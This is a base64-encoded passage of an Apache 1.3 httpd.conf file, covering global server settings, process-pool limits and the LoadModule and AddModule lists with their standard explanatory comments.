CiMgICAgIHdoaWNoIHJlc3BvbmRzIHRvIHJlcXVlc3RzIHRoYXQgYXJlbid0IGhhbmRsZWQgYnkg YSB2aXJ0dWFsIGhvc3QuCiMgICAgIFRoZXNlIGRpcmVjdGl2ZXMgYWxzbyBwcm92aWRlIGRlZmF1 bHQgdmFsdWVzIGZvciB0aGUgc2V0dGluZ3MKIyAgICAgb2YgYWxsIHZpcnR1YWwgaG9zdHMuCiMg IDMuIFNldHRpbmdzIGZvciB2aXJ0dWFsIGhvc3RzLCB3aGljaCBhbGxvdyBXZWIgcmVxdWVzdHMg dG8gYmUgc2VudCB0bwojICAgICBkaWZmZXJlbnQgSVAgYWRkcmVzc2VzIG9yIGhvc3RuYW1lcyBh bmQgaGF2ZSB0aGVtIGhhbmRsZWQgYnkgdGhlCiMgICAgIHNhbWUgQXBhY2hlIHNlcnZlciBwcm9j ZXNzLgojCiMgQ29uZmlndXJhdGlvbiBhbmQgbG9nZmlsZSBuYW1lczogSWYgdGhlIGZpbGVuYW1l cyB5b3Ugc3BlY2lmeSBmb3IgbWFueQojIG9mIHRoZSBzZXJ2ZXIncyBjb250cm9sIGZpbGVzIGJl Z2luIHdpdGggIi8iIChvciAiZHJpdmU6LyIgZm9yIFdpbjMyKSwgdGhlCiMgc2VydmVyIHdpbGwg dXNlIHRoYXQgZXhwbGljaXQgcGF0aC4gIElmIHRoZSBmaWxlbmFtZXMgZG8gKm5vdCogYmVnaW4K IyB3aXRoICIvIiwgdGhlIHZhbHVlIG9mIFNlcnZlclJvb3QgaXMgcHJlcGVuZGVkIC0tIHNvICJs b2dzL2Zvby5sb2ciCiMgd2l0aCBTZXJ2ZXJSb290IHNldCB0byAiL3Vzci9sb2NhbC9hcGFjaGUi IHdpbGwgYmUgaW50ZXJwcmV0ZWQgYnkgdGhlCiMgc2VydmVyIGFzICIvdXNyL2xvY2FsL2FwYWNo ZS9sb2dzL2Zvby5sb2ciLgojCgojIyMgU2VjdGlvbiAxOiBHbG9iYWwgRW52aXJvbm1lbnQKIwoj IFRoZSBkaXJlY3RpdmVzIGluIHRoaXMgc2VjdGlvbiBhZmZlY3QgdGhlIG92ZXJhbGwgb3BlcmF0 aW9uIG9mIEFwYWNoZSwKIyBzdWNoIGFzIHRoZSBudW1iZXIgb2YgY29uY3VycmVudCByZXF1ZXN0 cyBpdCBjYW4gaGFuZGxlIG9yIHdoZXJlIGl0CiMgY2FuIGZpbmQgaXRzIGNvbmZpZ3VyYXRpb24g ZmlsZXMuCiMKCiMKIyBTZXJ2ZXJUeXBlIGlzIGVpdGhlciBpbmV0ZCwgb3Igc3RhbmRhbG9uZS4g IEluZXRkIG1vZGUgaXMgb25seSBzdXBwb3J0ZWQgb24KIyBVbml4IHBsYXRmb3Jtcy4KIwpTZXJ2 ZXJUeXBlIHN0YW5kYWxvbmUKCiMKIyBTZXJ2ZXJSb290OiBUaGUgdG9wIG9mIHRoZSBkaXJlY3Rv cnkgdHJlZSB1bmRlciB3aGljaCB0aGUgc2VydmVyJ3MKIyBjb25maWd1cmF0aW9uLCBlcnJvciwg YW5kIGxvZyBmaWxlcyBhcmUga2VwdC4KIwojIE5PVEUhICBJZiB5b3UgaW50ZW5kIHRvIHBsYWNl IHRoaXMgb24gYW4gTkZTIChvciBvdGhlcndpc2UgbmV0d29yaykKIyBtb3VudGVkIGZpbGVzeXN0 ZW0gdGhlbiBwbGVhc2UgcmVhZCB0aGUgTG9ja0ZpbGUgZG9jdW1lbnRhdGlvbgojIChhdmFpbGFi bGUgYXQgPFVSTDpodHRwOi8vd3d3LmFwYWNoZS5vcmcvZG9jcy9tb2QvY29yZS5odG1sI2xvY2tm aWxlPik7CiMgeW91IHdpbGwgc2F2ZSB5b3Vyc2VsZiBhIGxvdCBvZiB0cm91YmxlLgojCiMgRG8g Tk9UIGFkZCBhIHNsYXNoIGF0IHRoZSBlbmQgb2YgdGhlIGRpcmVjdG9yeSBwYXRoLgojClNlcnZl clJvb3QgIi9ldGMvaHR0cGQiCgojCiMgVGhlIExvY2tGaWxlIGRpcmVjdGl2ZSBzZXRzIHRoZSBw YXRoIHRvIHRoZSBsb2NrZmlsZSB1c2VkIHdoZW4gQXBhY2hlCiMgaXMgY29tcGlsZWQgd2l0aCBl aXRoZXIgVVNFX0ZDTlRMX1NFUklBTElaRURfQUNDRVBUIG9yCiMgVVNFX0ZMT0NLX1NFUklBTEla RURfQUNDRVBULiBUaGlzIGRpcmVjdGl2ZSBzaG91bGQgbm9ybWFsbHkgYmUgbGVmdCBhdAojIGl0 cyBkZWZhdWx0IHZhbHVlLiBUaGUgbWFpbiByZWFzb24gZm9yIGNoYW5naW5nIGl0IGlzIGlmIHRo ZSBsb2dzCiMgZGlyZWN0b3J5IGlzIE5GUyBtb3VudGVkLCBzaW5jZSB0aGUgbG9ja2ZpbGUgTVVT VCBCRSBTVE9SRUQgT04gQSBMT0NBTAojIERJU0suIFRoZSBQSUQgb2YgdGhlIG1haW4gc2VydmVy IHByb2Nlc3MgaXMgYXV0b21hdGljYWxseSBhcHBlbmRlZCB0bwojIHRoZSBmaWxlbmFtZS4gCiMK TG9ja0ZpbGUgL3Zhci9ydW4vaHR0cGQubG9jawoKIwojIFBpZEZpbGU6IFRoZSBmaWxlIGluIHdo aWNoIHRoZSBzZXJ2ZXIgc2hvdWxkIHJlY29yZCBpdHMgcHJvY2VzcwojIGlkZW50aWZpY2F0aW9u IG51bWJlciB3aGVuIGl0IHN0YXJ0cy4KIwpQaWRGaWxlIC92YXIvcnVuL2h0dHBkLnBpZAoKIwoj IFNjb3JlQm9hcmRGaWxlOiBGaWxlIHVzZWQgdG8gc3RvcmUgaW50ZXJuYWwgc2VydmVyIHByb2Nl c3MgaW5mb3JtYXRpb24uCiMgTm90IGFsbCBhcmNoaXRlY3R1cmVzIHJlcXVpcmUgdGhpcy4gIEJ1 dCBpZiB5b3VycyBkb2VzICh5b3UnbGwga25vdyBiZWNhdXNlCiMgdGhpcyBmaWxlIHdpbGwgYmUg IGNyZWF0ZWQgd2hlbiB5b3UgcnVuIEFwYWNoZSkgdGhlbiB5b3UgKm11c3QqIGVuc3VyZSB0aGF0 CiMgbm8gdHdvIGludm9jYXRpb25zIG9mIEFwYWNoZSBzaGFyZSB0aGUgc2FtZSBzY29yZWJvYXJk IGZpbGUuCiMKU2NvcmVCb2FyZEZpbGUgbG9ncy9hcGFjaGVfcnVudGltZV9zdGF0dXMKCiMKIyBJ biB0aGUgc3RhbmRhcmQgY29uZmlndXJhdGlvbiwgdGhlIHNlcnZlciB3aWxsIHByb2Nlc3MgaHR0 cGQuY29uZiAodGhpcyAKIyBmaWxlLCBzcGVjaWZpZWQgYnkgdGhlIC1mIGNvbW1hbmQgbGluZSBv cHRpb24pLCBzcm0uY29uZiwgYW5kIGFjY2Vzcy5jb25mIAojIGluIHRoYXQgb3JkZXIuICBUaGUg bGF0dGVyIHR3byBmaWxlcyBhcmUgbm93IGRpc3RyaWJ1dGVkIGVtcHR5LCBhcyBpdCBpcyAKIyBy ZWNvbW1lbmRlZCB0aGF0IGFsbCBkaXJlY3RpdmVzIGJlIGtlcHQgaW4gYSBzaW5nbGUgZmlsZSBm b3Igc2ltcGxpY2l0eS4gIAojIFRoZSBjb21tZW50ZWQtb3V0IHZhbHVlcyBiZWxvdyBhcmUgdGhl IGJ1aWx0LWluIGRlZmF1bHRzLiAgWW91IGNhbiBoYXZlIHRoZSAKIyBzZXJ2ZXIgaWdub3JlIHRo ZXNlIGZpbGVzIGFsdG9nZXRoZXIgYnkgdXNpbmcgIi9kZXYvbnVsbCIgKGZvciBVbml4KSBvcgoj ICJudWwiIChmb3IgV2luMzIpIGZvciB0aGUgYXJndW1lbnRzIHRvIHRoZSBkaXJlY3RpdmVzLgoj CiNSZXNvdXJjZUNvbmZpZyBjb25mL3NybS5jb25mCiNBY2Nlc3NDb25maWcgY29uZi9hY2Nlc3Mu Y29uZgoKIwojIFRpbWVvdXQ6IFRoZSBudW1iZXIgb2Ygc2Vjb25kcyBiZWZvcmUgcmVjZWl2ZXMg YW5kIHNlbmRzIHRpbWUgb3V0LgojClRpbWVvdXQgMzAwCgojCiMgS2VlcEFsaXZlOiBXaGV0aGVy IG9yIG5vdCB0byBhbGxvdyBwZXJzaXN0ZW50IGNvbm5lY3Rpb25zIChtb3JlIHRoYW4KIyBvbmUg cmVxdWVzdCBwZXIgY29ubmVjdGlvbikuIFNldCB0byAiT2ZmIiB0byBkZWFjdGl2YXRlLgojCktl ZXBBbGl2ZSBPZmYKCiMKIyBNYXhLZWVwQWxpdmVSZXF1ZXN0czogVGhlIG1heGltdW0gbnVtYmVy IG9mIHJlcXVlc3RzIHRvIGFsbG93CiMgZHVyaW5nIGEgcGVyc2lzdGVudCBjb25uZWN0aW9uLiBT ZXQgdG8gMCB0byBhbGxvdyBhbiB1bmxpbWl0ZWQgYW1vdW50LgojIFdlIHJlY29tbWVuZCB5b3Ug bGVhdmUgdGhpcyBudW1iZXIgaGlnaCwgZm9yIG1heGltdW0gcGVyZm9ybWFuY2UuCiMKTWF4S2Vl cEFsaXZlUmVxdWVzdHMgMTAwCgojCiMgS2VlcEFsaXZlVGltZW91dDogTnVtYmVyIG9mIHNlY29u ZHMgdG8gd2FpdCBmb3IgdGhlIG5leHQgcmVxdWVzdCBmcm9tIHRoZQojIHNhbWUgY2xpZW50IG9u IHRoZSBzYW1lIGNvbm5lY3Rpb24uCiMKS2VlcEFsaXZlVGltZW91dCAxNQoKIwojIFNlcnZlci1w b29sIHNpemUgcmVndWxhdGlvbi4gIFJhdGhlciB0aGFuIG1ha2luZyB5b3UgZ3Vlc3MgaG93IG1h bnkKIyBzZXJ2ZXIgcHJvY2Vzc2VzIHlvdSBuZWVkLCBBcGFjaGUgZHluYW1pY2FsbHkgYWRhcHRz IHRvIHRoZSBsb2FkIGl0CiMgc2VlcyAtLS0gdGhhdCBpcywgaXQgdHJpZXMgdG8gbWFpbnRhaW4g ZW5vdWdoIHNlcnZlciBwcm9jZXNzZXMgdG8KIyBoYW5kbGUgdGhlIGN1cnJlbnQgbG9hZCwgcGx1 cyBhIGZldyBzcGFyZSBzZXJ2ZXJzIHRvIGhhbmRsZSB0cmFuc2llbnQKIyBsb2FkIHNwaWtlcyAo ZS5nLiwgbXVsdGlwbGUgc2ltdWx0YW5lb3VzIHJlcXVlc3RzIGZyb20gYSBzaW5nbGUKIyBOZXRz Y2FwZSBicm93c2VyKS4KIwojIEl0IGRvZXMgdGhpcyBieSBwZXJpb2RpY2FsbHkgY2hlY2tpbmcg aG93IG1hbnkgc2VydmVycyBhcmUgd2FpdGluZwojIGZvciBhIHJlcXVlc3QuICBJZiB0aGVyZSBh cmUgZmV3ZXIgdGhhbiBNaW5TcGFyZVNlcnZlcnMsIGl0IGNyZWF0ZXMKIyBhIG5ldyBzcGFyZS4g IElmIHRoZXJlIGFyZSBtb3JlIHRoYW4gTWF4U3BhcmVTZXJ2ZXJzLCBzb21lIG9mIHRoZQojIHNw YXJlcyBkaWUgb2ZmLiAgVGhlIGRlZmF1bHQgdmFsdWVzIGFyZSBwcm9iYWJseSBPSyBmb3IgbW9z dCBzaXRlcy4KIwpNaW5TcGFyZVNlcnZlcnMgNQpNYXhTcGFyZVNlcnZlcnMgMjAKCiMKIyBOdW1i ZXIgb2Ygc2VydmVycyB0byBzdGFydCBpbml0aWFsbHkgLS0tIHNob3VsZCBiZSBhIHJlYXNvbmFi bGUgYmFsbHBhcmsKIyBmaWd1cmUuCiMKU3RhcnRTZXJ2ZXJzIDgKCiMKIyBMaW1pdCBvbiB0b3Rh bCBudW1iZXIgb2Ygc2VydmVycyBydW5uaW5nLCBpLmUuLCBsaW1pdCBvbiB0aGUgbnVtYmVyCiMg b2YgY2xpZW50cyB3aG8gY2FuIHNpbXVsdGFuZW91c2x5IGNvbm5lY3QgLS0tIGlmIHRoaXMgbGlt aXQgaXMgZXZlcgojIHJlYWNoZWQsIGNsaWVudHMgd2lsbCBiZSBMT0NLRUQgT1VULCBzbyBpdCBz aG91bGQgTk9UIEJFIFNFVCBUT08gTE9XLgojIEl0IGlzIGludGVuZGVkIG1haW5seSBhcyBhIGJy YWtlIHRvIGtlZXAgYSBydW5hd2F5IHNlcnZlciBmcm9tIHRha2luZwojIHRoZSBzeXN0ZW0gd2l0 aCBpdCBhcyBpdCBzcGlyYWxzIGRvd24uLi4KIwpNYXhDbGllbnRzIDE1MAoKIwojIE1heFJlcXVl c3RzUGVyQ2hpbGQ6IHRoZSBudW1iZXIgb2YgcmVxdWVzdHMgZWFjaCBjaGlsZCBwcm9jZXNzIGlz CiMgYWxsb3dlZCB0byBwcm9jZXNzIGJlZm9yZSB0aGUgY2hpbGQgZGllcy4gIFRoZSBjaGlsZCB3 aWxsIGV4aXQgc28KIyBhcyB0byBhdm9pZCBwcm9ibGVtcyBhZnRlciBwcm9sb25nZWQgdXNlIHdo ZW4gQXBhY2hlIChhbmQgbWF5YmUgdGhlCiMgbGlicmFyaWVzIGl0IHVzZXMpIGxlYWsgbWVtb3J5 IG9yIG90aGVyIHJlc291cmNlcy4gIE9uIG1vc3Qgc3lzdGVtcywgdGhpcwojIGlzbid0IHJlYWxs eSBuZWVkZWQsIGJ1dCBhIGZldyAoc3VjaCBhcyBTb2xhcmlzKSBkbyBoYXZlIG5vdGFibGUgbGVh a3MKIyBpbiB0aGUgbGlicmFyaWVzLiBGb3IgdGhlc2UgcGxhdGZvcm1zLCBzZXQgdG8gc29tZXRo aW5nIGxpa2UgMTAwMDAKIyBvciBzbzsgYSBzZXR0aW5nIG9mIDAgbWVhbnMgdW5saW1pdGVkLgoj CiMgTk9URTogVGhpcyB2YWx1ZSBkb2VzIG5vdCBpbmNsdWRlIGtlZXBhbGl2ZSByZXF1ZXN0cyBh ZnRlciB0aGUgaW5pdGlhbAojICAgICAgIHJlcXVlc3QgcGVyIGNvbm5lY3Rpb24uIEZvciBleGFt cGxlLCBpZiBhIGNoaWxkIHByb2Nlc3MgaGFuZGxlcwojICAgICAgIGFuIGluaXRpYWwgcmVxdWVz dCBhbmQgMTAgc3Vic2VxdWVudCAia2VwdGFsaXZlIiByZXF1ZXN0cywgaXQKIyAgICAgICB3b3Vs ZCBvbmx5IGNvdW50IGFzIDEgcmVxdWVzdCB0b3dhcmRzIHRoaXMgbGltaXQuCiMKTWF4UmVxdWVz dHNQZXJDaGlsZCAxMDAwCgojCiMgTGlzdGVuOiBBbGxvd3MgeW91IHRvIGJpbmQgQXBhY2hlIHRv IHNwZWNpZmljIElQIGFkZHJlc3NlcyBhbmQvb3IKIyBwb3J0cywgaW4gYWRkaXRpb24gdG8gdGhl IGRlZmF1bHQuIFNlZSBhbHNvIHRoZSA8VmlydHVhbEhvc3Q+CiMgZGlyZWN0aXZlLgojCiNMaXN0 ZW4gMzAwMAojTGlzdGVuIDEyLjM0LjU2Ljc4OjgwCiNMaXN0ZW4gODAKCiMKIyBCaW5kQWRkcmVz czogWW91IGNhbiBzdXBwb3J0IHZpcnR1YWwgaG9zdHMgd2l0aCB0aGlzIG9wdGlvbi4gVGhpcyBk aXJlY3RpdmUKIyBpcyB1c2VkIHRvIHRlbGwgdGhlIHNlcnZlciB3aGljaCBJUCBhZGRyZXNzIHRv IGxpc3RlbiB0by4gSXQgY2FuIGVpdGhlcgojIGNvbnRhaW4gIioiLCBhbiBJUCBhZGRyZXNzLCBv ciBhIGZ1bGx5IHF1YWxpZmllZCBJbnRlcm5ldCBkb21haW4gbmFtZS4KIyBTZWUgYWxzbyB0aGUg PFZpcnR1YWxIb3N0PiBhbmQgTGlzdGVuIGRpcmVjdGl2ZXMuCiMKI0JpbmRBZGRyZXNzICoKCiMK IyBEeW5hbWljIFNoYXJlZCBPYmplY3QgKERTTykgU3VwcG9ydAojCiMgVG8gYmUgYWJsZSB0byB1 c2UgdGhlIGZ1bmN0aW9uYWxpdHkgb2YgYSBtb2R1bGUgd2hpY2ggd2FzIGJ1aWx0IGFzIGEgRFNP IHlvdQojIGhhdmUgdG8gcGxhY2UgY29ycmVzcG9uZGluZyBgTG9hZE1vZHVsZScgbGluZXMgYXQg dGhpcyBsb2NhdGlvbiBzbyB0aGUKIyBkaXJlY3RpdmVzIGNvbnRhaW5lZCBpbiBpdCBhcmUgYWN0 dWFsbHkgYXZhaWxhYmxlIF9iZWZvcmVfIHRoZXkgYXJlIHVzZWQuCiMgUGxlYXNlIHJlYWQgdGhl IGZpbGUgUkVBRE1FLkRTTyBpbiB0aGUgQXBhY2hlIDEuMyBkaXN0cmlidXRpb24gZm9yIG1vcmUK IyBkZXRhaWxzIGFib3V0IHRoZSBEU08gbWVjaGFuaXNtIGFuZCBydW4gYGh0dHBkIC1sJyBmb3Ig dGhlIGxpc3Qgb2YgYWxyZWFkeQojIGJ1aWx0LWluIChzdGF0aWNhbGx5IGxpbmtlZCBhbmQgdGh1 cyBhbHdheXMgYXZhaWxhYmxlKSBtb2R1bGVzIGluIHlvdXIgaHR0cGQKIyBiaW5hcnkuCiMKIyBO b3RlOiBUaGUgb3JkZXIgaW4gd2hpY2ggbW9kdWxlcyBhcmUgbG9hZGVkIGlzIGltcG9ydGFudC4g IERvbid0IGNoYW5nZQojIHRoZSBvcmRlciBiZWxvdyB3aXRob3V0IGV4cGVydCBhZHZpY2UuCiMK IyBFeGFtcGxlOgojIExvYWRNb2R1bGUgZm9vX21vZHVsZSBtb2R1bGVzL21vZF9mb28uc28KCiNM b2FkTW9kdWxlIG1tYXBfc3RhdGljX21vZHVsZSBtb2R1bGVzL21vZF9tbWFwX3N0YXRpYy5zbwpM b2FkTW9kdWxlIHZob3N0X2FsaWFzX21vZHVsZSBtb2R1bGVzL21vZF92aG9zdF9hbGlhcy5zbwo8 SWZEZWZpbmUgSEFWRV9CQU5EV0lEVEg+CkxvYWRNb2R1bGUgYmFuZHdpZHRoX21vZHVsZSAgIG1v ZHVsZXMvbW9kX2JhbmR3aWR0aC5zbwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9USFJPVFRM RT4KTG9hZE1vZHVsZSB0aHJvdHRsZV9tb2R1bGUgICAgbW9kdWxlcy9tb2RfdGhyb3R0bGUuc28K PC9JZkRlZmluZT4KTG9hZE1vZHVsZSBlbnZfbW9kdWxlICAgICAgICAgbW9kdWxlcy9tb2RfZW52 LnNvCkxvYWRNb2R1bGUgY29uZmlnX2xvZ19tb2R1bGUgIG1vZHVsZXMvbW9kX2xvZ19jb25maWcu c28KTG9hZE1vZHVsZSBhZ2VudF9sb2dfbW9kdWxlICAgbW9kdWxlcy9tb2RfbG9nX2FnZW50LnNv CkxvYWRNb2R1bGUgcmVmZXJlcl9sb2dfbW9kdWxlIG1vZHVsZXMvbW9kX2xvZ19yZWZlcmVyLnNv CiNMb2FkTW9kdWxlIG1pbWVfbWFnaWNfbW9kdWxlICBtb2R1bGVzL21vZF9taW1lX21hZ2ljLnNv CkxvYWRNb2R1bGUgbWltZV9tb2R1bGUgICAgICAgIG1vZHVsZXMvbW9kX21pbWUuc28KTG9hZE1v ZHVsZSBuZWdvdGlhdGlvbl9tb2R1bGUgbW9kdWxlcy9tb2RfbmVnb3RpYXRpb24uc28KTG9hZE1v ZHVsZSBzdGF0dXNfbW9kdWxlICAgICAgbW9kdWxlcy9tb2Rfc3RhdHVzLnNvCkxvYWRNb2R1bGUg aW5mb19tb2R1bGUgICAgICAgIG1vZHVsZXMvbW9kX2luZm8uc28KTG9hZE1vZHVsZSBpbmNsdWRl c19tb2R1bGUgICAgbW9kdWxlcy9tb2RfaW5jbHVkZS5zbwpMb2FkTW9kdWxlIGF1dG9pbmRleF9t b2R1bGUgICBtb2R1bGVzL21vZF9hdXRvaW5kZXguc28KTG9hZE1vZHVsZSBkaXJfbW9kdWxlICAg ICAgICAgbW9kdWxlcy9tb2RfZGlyLnNvCkxvYWRNb2R1bGUgY2dpX21vZHVsZSAgICAgICAgIG1v ZHVsZXMvbW9kX2NnaS5zbwpMb2FkTW9kdWxlIGFzaXNfbW9kdWxlICAgICAgICBtb2R1bGVzL21v ZF9hc2lzLnNvCkxvYWRNb2R1bGUgaW1hcF9tb2R1bGUgICAgICAgIG1vZHVsZXMvbW9kX2ltYXAu c28KTG9hZE1vZHVsZSBhY3Rpb25fbW9kdWxlICAgICAgbW9kdWxlcy9tb2RfYWN0aW9ucy5zbwoj TG9hZE1vZHVsZSBzcGVsaW5nX21vZHVsZSAgICAgbW9kdWxlcy9tb2Rfc3BlbGluZy5zbwpMb2Fk TW9kdWxlIHVzZXJkaXJfbW9kdWxlICAgICBtb2R1bGVzL21vZF91c2VyZGlyLnNvCkxvYWRNb2R1 bGUgYWxpYXNfbW9kdWxlICAgICAgIG1vZHVsZXMvbW9kX2FsaWFzLnNvCkxvYWRNb2R1bGUgcmV3 cml0ZV9tb2R1bGUgICAgIG1vZHVsZXMvbW9kX3Jld3JpdGUuc28KTG9hZE1vZHVsZSBhY2Nlc3Nf bW9kdWxlICAgICAgbW9kdWxlcy9tb2RfYWNjZXNzLnNvCkxvYWRNb2R1bGUgYXV0aF9tb2R1bGUg ICAgICAgIG1vZHVsZXMvbW9kX2F1dGguc28KTG9hZE1vZHVsZSBhbm9uX2F1dGhfbW9kdWxlICAg bW9kdWxlcy9tb2RfYXV0aF9hbm9uLnNvCkxvYWRNb2R1bGUgZGJfYXV0aF9tb2R1bGUgICAgIG1v ZHVsZXMvbW9kX2F1dGhfZGIuc28KI0xvYWRNb2R1bGUgYXV0aF9hbnlfbW9kdWxlICAgIG1vZHVs ZXMvbW9kX2F1dGhfYW55LnNvCiNMb2FkTW9kdWxlIGRibV9hdXRoX21vZHVsZSAgICBtb2R1bGVz L21vZF9hdXRoX2RibS5zbwojTG9hZE1vZHVsZSBhdXRoX2xkYXBfbW9kdWxlICAgbW9kdWxlcy9t b2RfYXV0aF9sZGFwLnNvCiNMb2FkTW9kdWxlIG15c3FsX2F1dGhfbW9kdWxlICBtb2R1bGVzL21v ZF9hdXRoX215c3FsLnNvCiNMb2FkTW9kdWxlIGF1dGhfcGdzcWxfbW9kdWxlICBtb2R1bGVzL21v ZF9hdXRoX3Bnc3FsLnNvCiNMb2FkTW9kdWxlIGRpZ2VzdF9tb2R1bGUgICAgICBtb2R1bGVzL21v ZF9kaWdlc3Quc28KI0xvYWRNb2R1bGUgcHJveHlfbW9kdWxlICAgICAgIG1vZHVsZXMvbGlicHJv eHkuc28KI0xvYWRNb2R1bGUgY2Vybl9tZXRhX21vZHVsZSAgIG1vZHVsZXMvbW9kX2Nlcm5fbWV0 YS5zbwpMb2FkTW9kdWxlIGV4cGlyZXNfbW9kdWxlICAgICBtb2R1bGVzL21vZF9leHBpcmVzLnNv CkxvYWRNb2R1bGUgaGVhZGVyc19tb2R1bGUgICAgIG1vZHVsZXMvbW9kX2hlYWRlcnMuc28KI0xv YWRNb2R1bGUgdXNlcnRyYWNrX21vZHVsZSAgIG1vZHVsZXMvbW9kX3VzZXJ0cmFjay5zbwojTG9h ZE1vZHVsZSBleGFtcGxlX21vZHVsZSAgICAgbW9kdWxlcy9tb2RfZXhhbXBsZS5zbwojTG9hZE1v ZHVsZSB1bmlxdWVfaWRfbW9kdWxlICAgbW9kdWxlcy9tb2RfdW5pcXVlX2lkLnNvCkxvYWRNb2R1 bGUgc2V0ZW52aWZfbW9kdWxlICAgIG1vZHVsZXMvbW9kX3NldGVudmlmLnNvCjxJZkRlZmluZSBI QVZFX1BFUkw+CkxvYWRNb2R1bGUgcGVybF9tb2R1bGUgICAgICAgIG1vZHVsZXMvbGlicGVybC5z bwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFA+CkxvYWRNb2R1bGUgcGhwX21vZHVsZSAg ICAgICAgIG1vZHVsZXMvbW9kX3BocC5zbwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFAz PgpMb2FkTW9kdWxlIHBocDNfbW9kdWxlICAgICAgICBtb2R1bGVzL2xpYnBocDMuc28KPC9JZkRl ZmluZT4KPElmRGVmaW5lIEhBVkVfUEhQND4KTG9hZE1vZHVsZSBwaHA0X21vZHVsZSAgICAgICAg bW9kdWxlcy9saWJwaHA0LnNvCjwvSWZEZWZpbmU+CjxJZkRlZmluZSBIQVZFX0RBVj4KTG9hZE1v ZHVsZSBkYXZfbW9kdWxlICAgICAgICAgbW9kdWxlcy9saWJkYXYuc28KPC9JZkRlZmluZT4KPElm RGVmaW5lIEhBVkVfUk9BTUlORz4KTG9hZE1vZHVsZSByb2FtaW5nX21vZHVsZSAgICAgbW9kdWxl cy9tb2Rfcm9hbWluZy5zbwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9TU0w+CkxvYWRNb2R1 bGUgc3NsX21vZHVsZSAgICAgICAgIG1vZHVsZXMvbGlic3NsLnNvCjwvSWZEZWZpbmU+CjxJZkRl ZmluZSBIQVZFX1BVVD4KTG9hZE1vZHVsZSBwdXRfbW9kdWxlICAgICAgICAgbW9kdWxlcy9tb2Rf cHV0LnNvCjwvSWZEZWZpbmU+CjxJZkRlZmluZSBIQVZFX1BZVEhPTj4KTG9hZE1vZHVsZSBweXRo b25fbW9kdWxlICAgICAgbW9kdWxlcy9tb2RfcHl0aG9uLnNvCjwvSWZEZWZpbmU+CgojIExvYWRN b2R1bGUgbHhwX21vZHVsZSAgICAgICAgIGxpYi9hcGFjaGUvbGlibHhwLnNvCkxvYWRNb2R1bGUg bHhwX21vZHVsZQkJL3Vzci9saWIvYXBhY2hlL2xpYmx4cC5zbwoKIyAgUmVjb25zdHJ1Y3Rpb24g b2YgdGhlIGNvbXBsZXRlIG1vZHVsZSBsaXN0IGZyb20gYWxsIGF2YWlsYWJsZSBtb2R1bGVzCiMg IChzdGF0aWMgYW5kIHNoYXJlZCBvbmVzKSB0byBhY2hpZXZlIGNvcnJlY3QgbW9kdWxlIGV4ZWN1 dGlvbiBvcmRlci4KIyAgW1dIRU5FVkVSIFlPVSBDSEFOR0UgVEhFIExPQURNT0RVTEUgU0VDVElP TiBBQk9WRSBVUERBVEUgVEhJUywgVE9PXQpDbGVhck1vZHVsZUxpc3QKI0FkZE1vZHVsZSBtb2Rf bW1hcF9zdGF0aWMuYwpBZGRNb2R1bGUgbW9kX3Zob3N0X2FsaWFzLmMKPElmRGVmaW5lIEhBVkVf QkFORFdJRFRIPgpBZGRNb2R1bGUgbW9kX2JhbmR3aWR0aC5jCjwvSWZEZWZpbmU+CjxJZkRlZmlu ZSBIQVZFX1RIUk9UVExFPgpBZGRNb2R1bGUgbW9kX3Rocm90dGxlLmMKPC9JZkRlZmluZT4KQWRk TW9kdWxlIG1vZF9lbnYuYwpBZGRNb2R1bGUgbW9kX2xvZ19jb25maWcuYwpBZGRNb2R1bGUgbW9k X2xvZ19hZ2VudC5jCkFkZE1vZHVsZSBtb2RfbG9nX3JlZmVyZXIuYwojQWRkTW9kdWxlIG1vZF9t aW1lX21hZ2ljLmMKQWRkTW9kdWxlIG1vZF9taW1lLmMKQWRkTW9kdWxlIG1vZF9uZWdvdGlhdGlv bi5jCkFkZE1vZHVsZSBtb2Rfc3RhdHVzLmMKQWRkTW9kdWxlIG1vZF9pbmZvLmMKQWRkTW9kdWxl IG1vZF9pbmNsdWRlLmMKQWRkTW9kdWxlIG1vZF9hdXRvaW5kZXguYwpBZGRNb2R1bGUgbW9kX2Rp ci5jCkFkZE1vZHVsZSBtb2RfY2dpLmMKQWRkTW9kdWxlIG1vZF9hc2lzLmMKQWRkTW9kdWxlIG1v ZF9pbWFwLmMKQWRkTW9kdWxlIG1vZF9hY3Rpb25zLmMKI0FkZE1vZHVsZSBtb2Rfc3BlbGluZy5j CkFkZE1vZHVsZSBtb2RfdXNlcmRpci5jCkFkZE1vZHVsZSBtb2RfYWxpYXMuYwpBZGRNb2R1bGUg bW9kX3Jld3JpdGUuYwpBZGRNb2R1bGUgbW9kX2FjY2Vzcy5jCkFkZE1vZHVsZSBtb2RfYXV0aC5j CkFkZE1vZHVsZSBtb2RfYXV0aF9hbm9uLmMKQWRkTW9kdWxlIG1vZF9hdXRoX2RiLmMKI0FkZE1v ZHVsZSBtb2RfYXV0aF9hbnkuYwojQWRkTW9kdWxlIG1vZF9hdXRoX2RibS5jCiNBZGRNb2R1bGUg YXV0aF9sZGFwLmMKI0FkZE1vZHVsZSBtb2RfYXV0aF9teXNxbC5jCiNBZGRNb2R1bGUgbW9kX2F1 dGhfcGdzcWwuYwojQWRkTW9kdWxlIG1vZF9kaWdlc3QuYwojQWRkTW9kdWxlIG1vZF9wcm94eS5j CiNBZGRNb2R1bGUgbW9kX2Nlcm5fbWV0YS5jCkFkZE1vZHVsZSBtb2RfZXhwaXJlcy5jCkFkZE1v ZHVsZSBtb2RfaGVhZGVycy5jCiNBZGRNb2R1bGUgbW9kX3VzZXJ0cmFjay5jCiNBZGRNb2R1bGUg bW9kX2V4YW1wbGUuYwojQWRkTW9kdWxlIG1vZF91bmlxdWVfaWQuYwpBZGRNb2R1bGUgbW9kX3Nv LmMKQWRkTW9kdWxlIG1vZF9zZXRlbnZpZi5jCjxJZkRlZmluZSBIQVZFX1BFUkw+CkFkZE1vZHVs ZSBtb2RfcGVybC5jCjwvSWZEZWZpbmU+CjxJZkRlZmluZSBIQVZFX1BIUD4KQWRkTW9kdWxlIG1v ZF9waHAuYwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFAzPgpBZGRNb2R1bGUgbW9kX3Bo cDMuYwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFA0PgpBZGRNb2R1bGUgbW9kX3BocDQu 